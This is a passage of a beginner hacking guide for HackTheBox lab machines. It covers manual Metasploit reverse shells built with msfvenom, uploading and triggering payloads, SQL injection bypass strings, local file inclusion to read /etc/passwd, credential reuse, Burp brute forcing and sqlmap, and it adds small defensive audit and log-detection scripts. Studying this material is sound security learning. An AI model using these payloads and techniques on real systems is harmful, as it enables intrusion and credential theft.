## **Hacking manually with the Metasploit framework**

Previously we used Metasploit to automagically exploit a vulnerability and get a shell on a box. But what kind of black magic does Metasploit do? Let's break it down:

1. It prepares a payload - a reverse shell - the code that executes on the target.
2. It prepares a listener/handler for receiving the reverse shell.
3. It uses a prepared exploit to exploit a vulnerable service. This means it gets code execution on the target, and is then able to execute the payload.

The listener catches the reverse shell connection - we now have a connection / reverse shell on the target. But we can't always rely on Metasploit to do this for us.

### 1 - Preparing the payload

First we prepare a payload with the correct file extension. The payload has to match your listener in Metasploit, and the technology on the target. Imagine a web server running IIS, and we've found out we can upload files and where the files are put. Let's generate an ASPX payload using msfvenom:

`msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip_addr lport=4444 -f aspx -o yourname.aspx`

* -p = payload
* -f = format
* -o = outputfile.extension

![](.gitbook/assets/image%20%2820%29.png)

We then use the `cat` command to print the contents of the file we generated. As you can see it's a bunch of mumbo jumbo code, but this is actually the _payload_, the code that will execute on the system to give you access.

![](.gitbook/assets/image%20%2858%29.png)

### 2 - Setting up a listener

Now that we have prepared our payload, we open msfconsole, which we will use to deliver our payload to the target box.
`msfconsole`

![](.gitbook/assets/image%20%2817%29.png)

Select the handler module, which lets us set up a listener to "catch" our shell from the payload we created:

`use exploit/multi/handler`

Set the correct payload (it needs to be identical to the payload we specified in `msfvenom`; if it does not match, it will not work properly and you will most likely not get a reverse shell back):

`set payload windows/meterpreter/reverse_tcp`

Now that our payload is selected we're going to check which options we have to set. So we type `options`.

![](.gitbook/assets/image%20%2823%29.png)

As you can see below there are three required options that must be set to start the listener. We also note that two of the options are already set for us. Hence, the only thing we have to do is set the listener address (lhost) option. The lhost and lport options must match exactly those we set when we created our payload. We don't need to use the IP address; we can also just set lhost to tun0, which is the VPN adapter used for connecting to HackTheBox.

`set lhost tun0`

`set lport 4444`

Once you have done this, type `options` to verify that you have set all the required options correctly. Some of them are filled automatically, and some must be manually entered.

![](.gitbook/assets/image%20%2847%29.png)

We now start our listener. The `-j` option runs the listener in the background, so you can continue using msfconsole while it's listening for incoming sessions. Please also note that sometimes the listener will start on the wrong IP address, so make sure it's correct. Usually this problem is fixed by setting lhost again and running the exploit command again.
`exploit -j`

To see currently active listeners, use the `jobs` command:

`jobs`

To see all currently active sessions you can type:

`sessions`

To interact with a session use the following command, where n is the number of the session you wish to interact with:

`sessions -i n`

Ctrl+Z is the shortcut to background a session.

### 3 - Running an exploit

Ok, so we have prepared our payload and listener. Now we need to actually find a way to upload and execute this payload on our target. In Part 1 of this guide we used an already prepared exploit module in Metasploit to exploit the target, but this time we actually have to do the uploading and execution manually. First, try to find a way to upload the payload to the machine. Many services like FTP (port 21) and SSH (port 22) allow file uploads. You then need some way to execute it. When you find a way, remember to have your listener ready so your payload, the reverse shell, can call back to your listener.

#### Uploading files to the target

The figure below shows a simple example where we use FTP to upload a payload to the server. In the green box in the bottom left corner you can see we first navigate to the `/var/www/html` directory, which is a common directory for web servers on Linux systems. We then use the `put` command to upload a payload, in this case a PHP file, since we are hoping to trigger it from the web server that runs PHP.

![File upload to target using FTP](.gitbook/assets/image%20%2818%29.png)

#### Executing the payload on the target

Now that we have successfully uploaded our payload, we need to execute it on the box. Maybe you remember from Part 1 that this is called "code execution". It means we are executing arbitrary code on the target machine.
As you can see in step 2 in the figure below, we navigate to the IP address of the target machine in the web browser and trigger the file we uploaded earlier. How does this work? Well, in the previous step we put the file in the web directory of the target, so the file is accessible on port 80, that is, through HTTP. When we open this file in the browser, the server executes the code it contains, the payload, which is a reverse shell. That makes it connect back to our machine and we get a reverse shell. We have now successfully compromised that machine.

![Executing a payload on the target](.gitbook/assets/image%20%283%29.png)

#### I'm not that lucky

* What if no service appears to be vulnerable and I can't find any exploit?
* What if there is no obvious way like uploading a file using FTP or SSH?
* What if, let's say, only port 80 is open?

This will happen to you, often. So, how do we then get our payload on the target?

We need to start exploring more manual ways of getting our payload on the target. Since port 80 is open it means the target is running a web server. So start by navigating to the IP address of the target in the web browser in Kali. Start looking around and take a good look at what the web app is. Is it a shop of any kind, a WordPress blog, does it have a login portal? Explore the source code of the page.

Remember, the kinds of vulnerabilities we found earlier have been on a lower level, that is, vulnerabilities in the server itself. Now we are hunting for vulnerabilities that reside in the web application. This is a whole new game, so we have dedicated the entire [Part 3](part-3-web-hacking.md) of this guide to it.

## **Credential abuse**

Reuse of credentials (usernames, passwords and keys) and default credentials are the most common vulnerabilities, and you will see them everywhere.
It's such an easy win if it works that you must never forget to at least try, even though it may seem unlikely.

* Try defaults like `admin/password` and `admin/admin`
* Google default creds for whatever you are looking at, e.g. _"wordpress default login"_.
* Combine different usernames and passwords you find around. You never know where somebody could have reused them.

A fun exercise here can be to google your own home router make and model to see if you can find the default username and password. If you are the legal owner of the router, try to log in and see what happens!

![](https://lh3.googleusercontent.com/7mdc-kMI1RuZJ5sgYeDmlH26L2AOSULraoWBllzrqrivEGEYo9TpZFBCYL0cMbVTVIyhUbnhxT6go7Cp18kNmo9RPGX93Slky-CnhAHi9P1OlqgLCI7EDl5rCFp9IY-6fgr-bfm6ZWM)

## **Linux terminal**

For help with a command, type the command and then

`-h` or `--help`

`man <command>` - Displays the man(ual) page for command line tools

`cat` - Display the contents of files

`less <file>` - View and navigate the contents of a file

`grep` - Search for words inside a file

`find` - Locate files and directories

`locate <file>` - Locate a file

`strings` - Find text in files

`ssh <user>@<ip-address>` - Connect to a box using SSH (secure shell) on port 22

`<` and `>` are called redirection. That means you can take the output of a command and write it to a file. See the example below with `echo` and `>`. If the `filename.txt` file does not exist it will be created.

`echo "string" > filename.txt`

`python -m SimpleHTTPServer 80` - Start a simple web server to host files on Kali

`wget http://<ip>/<file>` - Download a file from a server

`apt install <package>` - Installing things in Kali

## **Nmap tricks**

Let's refresh some of the nmap options we used earlier and take a look at some new ones.
`-A` - OS detection, version detection, script scanning, and traceroute. Gives a lot of useful info which will help you find vulnerabilities

`-v` - Verbose, provides more output when scanning

`-n` - Skip DNS resolution, saves some time scanning

So the command becomes

`nmap -A -n -v <ip>`

### Nmap scripts

The Nmap Scripting Engine can be quite useful to improve the discovery of services. Kali comes with a lot of nmap scripts, which you can list with the `ls` command:

`ls -la /usr/share/nmap/scripts/*`

Here is the same command, but with a wildcard (\*) to look up all scripts that start with smb. Maybe you remember that SMB is the file sharing protocol for Windows, which is great for hackers because it can be used for so much, and is a generally vulnerable protocol. The MS17-010 exploit that we had a quick look at in Part 1 was an SMB exploit.

![](.gitbook/assets/image%20%2864%29.png)

So let's try to use nmap with a script. It can also be wise to supply nmap with a port when you are scanning specific services. You can do this with the `-p` option followed by the port. See the example below using ports 139 and 445 (SMB runs on these) for running a script that scans for the MS17-010 vulnerability from earlier in this guide.

`nmap <ip> --script <script>`

`nmap 10.10.10.10 --script smb-vuln-ms17-010 -p 139,445`

## **Privilege escalation**

In the beginning of your hacking journey, privilege escalation can be very daunting, because you don't really know exactly what you're looking for. That's why we have the entire [fourth part of this guide](part-4-privilege-escalation.md) dedicated to breaking it down into simple steps. However, to make sure you don't get stuck in the mud at this point, we have included some of the basics which might help. You will probably see these tricks repeated with further detail in Part 4.
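The Linux checks that follow all come down to reading a handful of files (`/etc/passwd`, `/etc/shadow`, `/etc/sudoers`) and spotting settings that hand out root. The same reading done from the administrator's side is a hardening audit. The script below is an added example written for this guide, not code from the original; it works on constructed sample file contents embedded in the script (the account names, hashes and rules are made up), and on a real host you would read the actual files instead.

```python
"""Audit the account and sudo configuration that the Linux checks below read.

Added example, not from the guide. The sample file contents are constructed
for this demonstration; on a real host you would read the actual files.
"""

# Constructed /etc/passwd sample: a second UID 0 account besides root is a
# classic sign of a backdoored or badly configured host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

# Constructed /etc/shadow sample: an empty second field means no password at all.
SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhash:17800:0:99999:7:::
alice:$6$othersalt$otherhash:17800:0:99999:7:::
guest::17800:0:99999:7:::
www-data:*:17800:0:99999:7:::
"""

# Constructed /etc/sudoers sample: a passwordless "ALL" rule for a service
# account turns any bug in the web application into root.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
"""


def _records(text, nfields):
    """Yield colon-separated records with exactly nfields fields; skip comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) == nfields:
            yield fields


def audit_passwd(passwd_text):
    """Flag every UID 0 account other than root."""
    findings = []
    for name, _pw, uid, _gid, _gecos, _home, shell in _records(passwd_text, 7):
        if uid == "0" and name != "root":
            findings.append(f"passwd: extra UID 0 account '{name}' with shell {shell}")
    return findings


def audit_shadow(shadow_text):
    """Flag accounts whose password field is empty (login without any password)."""
    findings = []
    for fields in _records(shadow_text, 9):
        name, pw_hash = fields[0], fields[1]
        if pw_hash == "":
            findings.append(f"shadow: account '{name}' has an empty password field")
    return findings


def audit_sudoers(sudoers_text):
    """Flag NOPASSWD rules that grant ALL commands."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = line.split("#", 1)[0].strip()
        if "NOPASSWD:" in rule and rule.split("NOPASSWD:", 1)[1].strip() == "ALL":
            findings.append(f"sudoers: passwordless ALL rule: {rule}")
    return findings


def audit_all(passwd_text, shadow_text, sudoers_text):
    """Run all three audits and return the combined list of findings."""
    return audit_passwd(passwd_text) + audit_shadow(shadow_text) + audit_sudoers(sudoers_text)


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_SUDOERS):
        print(finding)
```

Each finding in the sample output corresponds to one of the quick wins the command list below is hunting for; on a hardened box all three functions return empty lists.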
### Linux

For Linux: [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

Confidential information and users that you can check:

`id`

`su`

`sudo -l`

`cat /etc/passwd`

`cat /etc/shadow`

`cat /etc/group`

`cat /etc/sudoers`

`ls -alh /var/www/`

`ls -ahlR /root/`

`ls -ahlR /home/`

### Windows

#### Metasploit exploit suggester

If you have gotten a Meterpreter session on a Windows box but you realize you are not an administrator, you have to escalate your privileges. Sometimes boxes are not properly patched and you can use local exploits that exploit vulnerabilities in the Windows kernel to escalate. Metasploit has several post modules for this purpose. Post means they can only be used after you have compromised the machine and gotten a Meterpreter or shell. However, we need to find such exploits, and the exploit suggester automatically searches for exploits that may allow you to escalate privileges.

When we get a Meterpreter session we see a message that says something like "Meterpreter session 1 opened", followed by us getting an interactive Meterpreter session in msfconsole.

![](.gitbook/assets/image%20%2853%29.png)

This is, obviously enough, called a _session_. When we use the exploit suggester, we already have session 1 set up. If we press Ctrl+Z we are asked if we want to background our current session. Press y to do that. You are now back in the regular msfconsole, while your session is kept alive in the background.
You can now do the following:

`use post/multi/recon/local_exploit_suggester`

`set session 1`

`exploit`

![](.gitbook/assets/image%20%2844%29.png)

Now that the suggester has done its job, you will probably get a couple of suggestions for exploits. There are ways to properly verify whether they will work, but that is out of scope for this guide. We recommend that you try each one of the exploits, by using the `use` command in msfconsole with the exploit path, setting the session to your current Meterpreter session and running it by typing `exploit` as before. If you are lucky, it will spawn a new Meterpreter session with elevated privileges. That means you have successfully escalated your privileges from a local user to a local administrator. You are now in full control of your target!

* [https://www.rapid7.com/db/modules/post/multi/recon/local_exploit_suggester](https://www.rapid7.com/db/modules/post/multi/recon/local_exploit_suggester)
* [https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

![](https://lh5.googleusercontent.com/P9kkB83xhsIMurqs2eIfvqmyUoUvl0SZ86SrZ1uwAXVSIfS4IltiCtg0xrdmy1TIWjcgxSnw95COoiz85FufBJ3UMHAApaunUnOTjULuUoksp2tmE92h-XWAI8dZH28mI72aKEZagL8)

--------------------------------------------------------------------------------
/part-3-web-hacking.md:
--------------------------------------------------------------------------------
---
description: >-
  Web hacking is essential hacker knowledge. You are already and will be exposed
  to a ton of different web services, and a lot of them can be exploited.
---

# Part 3 - Web hacking

## What do you learn in this part?

* General web concepts
* Web vulnerabilities
* Web hacking tools
* Hacking some more boxes!
**Boxes that are suitable for this part**

* CronOS - 10.10.10.13
* Shocker - 10.10.10.56

**Bonus boxes**

* Beep
* Valentine

## **General web concepts**

Before we start hacking the web, we need to know some basics about how the web works. A web service consists of a few different components.

* **Web server** - the server that handles HTTP requests
* **Web service** - an application run by a web server, performing tasks and returning structured data to a calling program, rather than just static content.
* **Content Management System (CMS)** - front end for serving content. WordPress and Drupal are examples of CMSs.
* **Web application** - basically what you see on the screen

## Web vulnerabilities

### OWASP Top 10

When you start your hacking journey you will probably hear talk about [The Open Web Application Security Project (OWASP) Top Ten](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project). This is an annually reviewed overview of web application security risks worldwide. The most recent update is from 2017. Here are some important vulnerabilities you will see on HTB:

* [Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection)
* [Broken access control](https://www.owasp.org/index.php/Broken_Access_Control)
* [Security misconfiguration](https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration)
* [Using components with known vulnerabilities](https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities)

### **SQL Injections**

SQL injection is one of the most common web hacking techniques. It usually occurs when a user is asked for input, like a username and password, or a search field. What happens is that when you type in your username, a database statement is sent to the backend database.
Sometimes, the input is not filtered for things like special characters, and hence we are able to manipulate the statements.

Let's take an example. We have this login field, asking us to give our UserId, but instead of entering our UserId we put in some jazz.

![](.gitbook/assets/image%20%2815%29.png)

What happens then is that the program takes that input and puts it into a statement that it sends to the database. The statement becomes:

`SELECT * FROM Users WHERE UserId = 105 OR 1=1;`

**Why do we put 1=1?** The SQL statement above is valid and will return ALL rows from the "Users" table, since `OR 1=1` is always TRUE. So if the Users table contains usernames and passwords, we can retrieve the entire thing. Quite dangerous!

It's not always as easy as the example of course, and sometimes we aren't really interested in extracting the entire database, but rather just getting past a login. These are some examples of quite simple SQL injections. Put them in the username and/or password field, and see what happens. Maybe you will get lucky!

* `admin' or '1'='1`
* `admin'-- - " or ""="`
* `' or 1=1 -- - '`
* `union select 1,2,3 -- -`

### **File inclusions**

A file inclusion is when we are able to access arbitrary files on the file system, through the web server.

* Local file inclusion (LFI) - read files on the remote file system
* Remote file inclusion (RFI) - upload files to the file system

LFI happens often in PHP and PHP-based sites. Let's take an example from a simple website I've set up. This is at `index.php`, which is basically the main part of the site. What we are going to explore is whether there are any parameters that have an LFI vulnerability.

![](.gitbook/assets/image%20%2854%29.png)

Looks like a regular site. So let's just add a `?page` to the URL and see what happens.
You may now ask, "how did you know it was page?", which we will get back to later in the course.

![](.gitbook/assets/image%20%2824%29.png)

What is going on down there? Some nagging about `include php` and some error stuff. In PHP, the script is going to take a user supplied value and use it as a path to include a file; the value provided can however be modified. So instead of providing PHP with the file it expects, we say we want to include another file from the local file system. So what kind of file do we retrieve and how do we know where it's located? The answer is quite simple: we go for a file we know the path to and that is always present on the local file system. Since we can infer that this is Linux from the `/var/www/index.php` path in the error message, we choose to get the **`/etc/passwd`** file, which contains usernames.

![](.gitbook/assets/image.png)

Huh? Why doesn't this work? Well, since the index.php file already resides in the `/var/www/` directory, we are now essentially trying to go to `/var/www/etc/passwd`, which naturally doesn't exist. So we need to go back a few steps so we end up in the right directory. Maybe you remember from the Linux Journey course that two dots `..` is like going backwards in the directories of the Linux file system.

![](.gitbook/assets/image%20%2842%29.png)

Ok, you are probably getting annoyed now. Why do you keep showing us things that apparently don't work? Well, the answer is on the screen. If you read the error message closely you'll see that we are now trying to read a file `/etc/passwd.php`, but the passwd file does not have a `php` file extension, so we need some way to remove it from our query. We use a little trick called the null byte for this. It's a bug in older versions of PHP that lets us get rid of it. The null byte is URL-encoded as `%00`, so let's give this a shot.

![](.gitbook/assets/image%20%285%29.png)

Finally!
We are able to read the `passwd` file from the local file system of our target machine. As you can see the output is a bit jumbled, so we copy this out to our notes and format it neatly.

Now we want you to try and imagine two things:

1. What could I use these usernames for?
2. What other known files could be useful to retrieve?

**Summary for file inclusions**

Because the `page` parameter in the `index.php` code is not properly handled, we are now able to read arbitrary files on the file system, for example the `passwd` file which contains usernames. This is why it's so important to have knowledge of the Linux file system.

RFI gives you LFI, but LFI doesn't necessarily give you RFI. If you think you have found an LFI you can try to verify it with [fimap](https://tools.kali.org/web-applications/fimap).

`fimap -u http://ip/file.php?path=..`

But what files do we look for if we find a file inclusion error? Files containing usernames, passwords, source code, PHP files, perhaps even [SSH keys](http://blakesmith.me/2010/02/08/understanding-public-key-private-key-concepts.html). But we must know the file name and path! Therefore, learning enough about the file system to know [what files to look for](https://digi.ninja/blog/when_all_you_can_do_is_read.php) and where they are usually located is crucial.

### **Domain Name System (DNS)**

#### **Adding a DNS entry**

For some boxes on HTB, we have to manually add a DNS entry. What does this mean? When you enter a URL into your web browser, DNS is the technology that translates the text address into an IP address for you. This is so we don't have to go around and remember IP addresses for websites we like to visit. Now, we can manually specify DNS entries; that means we say that we would like this address, e.g. `lol.htb`, to translate to `10.10.10.10`.
We do this in Linux by opening up the file called `/etc/hosts` in a text editor. Add an entry on a new line like this: `10.10.10.10 lol.htb` and save the file. Yes, just like that and nothing more. You can then navigate to lol.htb in your web browser and it will automatically translate `lol.htb` to the IP address `10.10.10.10`.

The screenshot shows the `/etc/hosts` file opened in the vim editor in the terminal. As you can see, a DNS entry for `lol.htb` has been added to the file. This is a fictional machine and IP for the purpose of this example.

![](.gitbook/assets/image%20%2837%29.png)

#### Zone transfer attack

A DNS zone transfer is the process where a DNS server passes a copy of part of its database (which is called a "zone") to another DNS server. It basically allows us to make the server reveal some information about itself. We can exploit this to learn more about the system, and perhaps discover URLs to investigate.

To dig up some more info about the domain, run this DNS query. This will of course only work on machines that have exposed DNS as a service externally. That basically means if you see that port 53 (DNS) is open, you can try this. Note that it might not always work, and you have to have a DNS entry added so your computer knows which DNS server to send the request to.

`dig axfr <domain> @<dns-server>`

![](https://lh3.googleusercontent.com/32Uh7W3TrxMLpStYF19GXML61UU-qFLdKACaqfy_Za43mn-jGnoZs7VU0Fh_8KLCg0Rmk7aHf5tD3XkgWlAcZPPuD_ewG9AlveqrLNnlWU3AcbUjmIMSypaRVDYimUq2Rwhl_rO4SDg)

## **Web hacking tools**

### Curl and nikto

These two are easy to run and are a good start when enumerating a web server for vulnerabilities.

`curl -i <url>` - Downloads only the header of the URL you specify.

`nikto -h <url>` - A web server scanner that tests for dangerous files, outdated server software and other problems.
Can find vulnerabilities in web server versions as well.

### Burp

Burp Suite is a professional tool for web hacking. It contains a ton of features and can be extended with several plugins. This allows us to do pretty much everything we want towards web services, and it is used both by amateur hackers and penetration testing professionals every single day. Learning to use Burp efficiently is very important.

#### Burp is a proxy

A proxy is when you route network traffic somewhere else. Burp captures the requests that we send to a website, and allows us to manipulate them in many ways. In Firefox we can adjust the proxy settings, but this is a bit clunky, so the add-on FoxyProxy is recommended. Install the FoxyProxy browser extension in [Firefox](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/) or Chromium and add a new proxy with IP 127.0.0.1 and port 8080. This will send all the requests from your web browser into Burp. This is the standard proxy for Burp, so your web requests will be sent to Burp, where you work with them in the interface.

![What Burp looks like. Not much going on here ... yet](.gitbook/assets/image%20%2849%29.png)

Let's go through some of the features of Burp Suite.

**Proxy - intercept requests**

Here, I have set up the OWASP Juice Shop for the purpose of this demo. It's a little website running locally on my machine, hence the URL shows localhost on port 3000. As you can see, I have clicked the "Intercept is on" button and it's now toggled on. That means every request in the web browser is intercepted in Burp and the web application hangs until I decide what to do. If we want, we can now edit any parameter in the request, forward it, or drop it.

![A request has been intercepted](.gitbook/assets/image%20%2857%29.png)

**Repeater - repeating requests**

Same as Proxy, but you can repeat requests as many times as you want.
Useful to try a web request numerous times and make changes. Below I have right-clicked in the interface and selected "Send to Repeater". The Repeater tab flashes orange.

![](.gitbook/assets/image%20%2827%29.png)

Now I have gone to the Repeater tab and pressed "Go". It basically does exactly the same as "Forward" in Proxy, but I can repeat it as many times as I want and make the necessary adjustments. Very useful if you're trying to make some little element of your payload just right, like an SQL injection.

![](.gitbook/assets/image%20%2848%29.png)

**Spider - find hidden directories and files**

If we go to the target website and start clicking around, we should soon see that the Target tab in Burp starts filling up with different kinds of files and directories. This is basically called spidering, a process of manually discovering content. This process can be automated to a certain extent with Burp.

![We've discovered a lot of stuff here!](.gitbook/assets/image%20%281%29.png)

Now, we can right-click on the URL and select "Spider this host". This will start an automatic scan for directories and files, even recursively. Check the Spider tab for progress and to start and stop the spider.

![](.gitbook/assets/image%20%2839%29.png)

**Intruder - brute forcing**

The Intruder is what you use to break the door in. It's the hammer of the Burp Suite. It allows us to do not only one request like the Proxy, or many in a row like Repeater, but actually as many as you want, and pretty quickly too! However, brute force is not always the best option, and if you choose to perform a brute force attack on a website you had better be careful.

Below I have toggled the interceptor on, and as you can see my test username and password have been submitted. Remember, the request hasn't been sent yet, so hold your horses.
Right-click and press the "Send to Intruder" button. The Intruder tab starts flashing orange.

![](.gitbook/assets/image%20%282%29.png)

If you navigate to the Positions tab, you'll see the request from before. Click the Clear button on the right-hand side to clear the markers that Burp set automatically. What we want to try are different passwords. At the moment I'm just going to assume that my test user is valid, which it probably is not.

![](.gitbook/assets/image%20%288%29.png)

![I'm ready to brute force the shit out of this password](.gitbook/assets/image%20%2838%29.png)

Now we click the Payloads tab, because we need to specify a wordlist we want to brute force with. That means we are going to replace where I have written "password" with a ton of different common passwords, to see if any of them are valid. Burp has some built-in lists that can be selected from the dropdown list, but Kali also has a lot of good wordlists in the `/usr/share/wordlists` directory that you can try. For now, let's just select a Burp list.

{% hint style="info" %}
One of the most common lists for brute force attacks is called `rockyou`. It contains 14+ million passwords and is built into Kali. However, brute forcing with such a list will take ages. You can find it at `/usr/share/wordlists/rockyou.txt`
{% endhint %}

![Ready to hack](.gitbook/assets/image%20%2810%29.png)

Now I am going to click "Start attack" and it will start brute forcing this password. As you can see, I will try 3424 different passwords. Quite intensive!

![](.gitbook/assets/image%20%287%29.png)

Looks like I'm not having so much luck on the first 723 guesses. How can I tell? Well, the status code should not be in the 400 category, as these are commonly errors like "401 Unauthorized", as you can see in the Response tab. I would want to get something like "200 OK", which means the request was fulfilled.
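The status-code pattern just described (a long run of 401s from one client to the login endpoint, then a 200) is exactly what an Intruder run looks like in the server's access log, which makes it the simplest thing for the other side to alert on. The script below is an added example written for this guide, not code from the original or from Burp; it parses a few constructed access log lines in the common log format (the addresses, timestamps and the `/rest/user/login` path are made up for the demo) and flags the client whose failures form a burst, noting whether a successful login followed the burst.

```python
"""Spot a password brute force in web server access logs.

Added example, not from the guide. The log lines are constructed for this
demonstration; the login path, the failure threshold and the time window are
assumptions you would tune per application.
"""
import re
from datetime import datetime

LOGIN_PATH = "/rest/user/login"   # assumed login endpoint
THRESHOLD = 5                     # this many failures...
WINDOW_SECONDS = 60               # ...inside this many seconds count as a burst

# Constructed sample: 10.0.0.5 fails six times in a few seconds and then gets
# a 200; 10.0.0.9 mistypes once and then logs in normally.
SAMPLE_LOG = """\
10.0.0.9 - - [12/Sep/2018:09:27:01 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:02 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:02 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2018:09:27:03 +0000] "POST /rest/user/login HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:03 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:03 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:04 +0000] "GET /ftp HTTP/1.1" 200 1190 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:04 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:05 +0000] "POST /rest/user/login HTTP/1.1" 401 26 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Sep/2018:09:27:09 +0000] "POST /rest/user/login HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Common log format: client ident user [timestamp] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def analyze(log_text, login_path=LOGIN_PATH, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Per source IP: number of login failures, whether they formed a burst, and
    whether a successful login followed the burst (the case that needs a response)."""
    state = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or path != login_path:
            continue
        s = state.setdefault(ip, {"failures": 0, "burst": False, "success_after_burst": False, "_times": []})
        if status == 401:
            s["failures"] += 1
            s["_times"].append(ts)
            # the last `threshold` failures inside `window` seconds make a burst
            if len(s["_times"]) >= threshold:
                span = (s["_times"][-1] - s["_times"][-threshold]).total_seconds()
                if span <= window:
                    s["burst"] = True
        elif status == 200 and s["burst"]:
            s["success_after_burst"] = True
    return {ip: {k: v for k, v in s.items() if not k.startswith("_")} for ip, s in state.items()}


def suspicious_ips(log_text, **kwargs):
    """IPs whose login failures formed a burst; those with a success after the burst come first."""
    report = analyze(log_text, **kwargs)
    flagged = [ip for ip, s in report.items() if s["burst"]]
    return sorted(flagged, key=lambda ip: not report[ip]["success_after_burst"])


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

A single 401 followed by a 200 is an ordinary typo and is not flagged; the burst-then-success pattern is the one that warrants locking the account and checking the session that was opened. Rate limiting or lockout on the login endpoint is what stops an Intruder run from getting this far in the first place.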
So I could let this complete, but most likely my username is not correct. Until you get more experience with Burp, only attempt brute forcing either the username or the password at once. In most cases, that means you'll need to figure out a username some other way.

If you are interested in learning more about the features of Burp, a very good [Burp Tutorial series](https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA) is available on YouTube.

### **Busting directories**

Sometimes we have a web server on `www.lol.htb`, but what if all the secret passwords are stored at `www.lol.htb/secret_passwords`? How do we access them, if there is no link on the web page to the directory? Very often, web site administrators have not been able to properly hide or restrict access to every file and directory on their service. Therefore, we need to do some educated guessing, by trying common files and directories. This is a very common task, so we have very good tools for this!

#### Dirbuster

Use dirb to find directories on a web server. You can also use the GUI version called DirBuster. Just search for it in Kali. The terminal version is called dirb. We recommend you try them both.

`dirb <url>`

Kali comes with a lot of good wordlists. This one is very good and reliable for finding most stuff: `/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt`

#### Dirsearch

Dirbuster isn't always the fastest. If you start noticing its restrictions, we suggest you test dirsearch. You can clone it from GitHub with

`git clone https://github.com/maurosoria/dirsearch`

You then run it with the following command, where the IP/URL and port must be set.

`python3 dirsearch.py -u http://ip:port -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php -t 100`

Remember to try different extensions like `.py .pl .cgi` and `.sh`. What this does is add an extension to every word in the wordlist in addition to just searching for the directories. So you will try both `http://lol.htb/secret` and `http://lol.htb/secret.php`. You might discover a lot of interesting files this way. Also, remember to try relevant file extensions. If you are uncertain what kind of extensions to use, look at the type of web services that are running and Google around for what kind of extensions are used. For example you might learn that IIS servers very often use `asp` and `aspx` extensions, while content managers such as WordPress rely on `php`.

### SQLmap - exploiting SQL injections automatically

SQLmap is one of our absolute favorite hacking tools. It's immensely powerful, to the extent that even if you sat down and learnt every option in the program you would still have a lot to learn. It automatically performs every kind of SQL injection you can imagine and even allows you to get a shell on the system straight from the program. Quite fun indeed!

This is pretty much the route we take when working with databases and injections. It is all built in a very neat hierarchy.

1. **DBMS** - database management system, e.g. MySQL, PostgreSQL, MSSQL
2. **Databases** - the actual databases that contain the content. You can have many databases in one DBMS.
3. **Tables** - A database can have many tables
4. **Columns** - A table can have many columns
5. **Rows** - this is usually where you will find your username and password

#### **How to exploit an SQL injection with SQLMap**

Capture a request with Burp and copy-paste it. Save it to a file `r.txt`. Then execute sqlmap by pointing to the request.
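The "append a `'` and watch for a database error" test that sqlmap automates only works because the application builds its query out of the raw `id` parameter. The example below is added here and is not code from this guide or from sqlmap; it shows the two shapes side by side in Python with an in-memory SQLite database standing in for the page's `photoblog` database (the schema and rows are constructed). The concatenating version turns a stray quote into a syntax error from the database, which is exactly the signal the walkthrough looks for, while the parameterised version treats the same input as a value that simply matches nothing.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the photoblog database (constructed schema and rows)."""
    con = sqlite3.connect(":memory:")
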